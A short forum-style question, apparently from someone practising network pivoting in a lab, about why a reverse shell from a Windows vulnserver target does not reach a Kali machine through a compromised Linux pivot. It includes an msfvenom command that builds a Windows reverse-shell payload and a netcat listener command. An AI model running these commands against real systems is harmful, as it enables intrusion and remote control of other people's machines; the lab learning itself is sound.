January 8, 2021

Pivoting

Basically, I’m learning how to pivot with the following setup and need a helping hand.

Scenario

Kali (attack machine) -> Linux (pivot machine) -> Windows (target machine)

To start with, I exploited Linux and created a Meterpreter session with root privileges, then used autoroute from the Meterpreter session, which confirms the open ports on Windows.

I have got vulnserver on Windows for buffer overflow. A socks4a proxy server has been set up, so the Windows machine is taking commands via proxychains (nmap, psexec, etc.) from Kali. From here, what I’m trying to do is execute shellcode for the Windows machine via proxychains and catch the reverse shell back on my Kali machine. I have already tested the shellcode with direct access Kali -> Windows, and the exploit is all working and getting a shell with nc -nlvp 4443 from Kali.

But it is not working via a pivot machine. I used Msfvenom as a payload with the following LHOST and LPORT IPs.

msfvenom -p windows/shell_reverse_tcp LHOST=<Linux-pivot-IP> LPORT=4443 -b '<retn-variable>' EXITFUNC=thread -f python -v payload

Running nc -nlvp 4443 on Kali is not getting me a reverse shell from Windows. Have I missed anything?
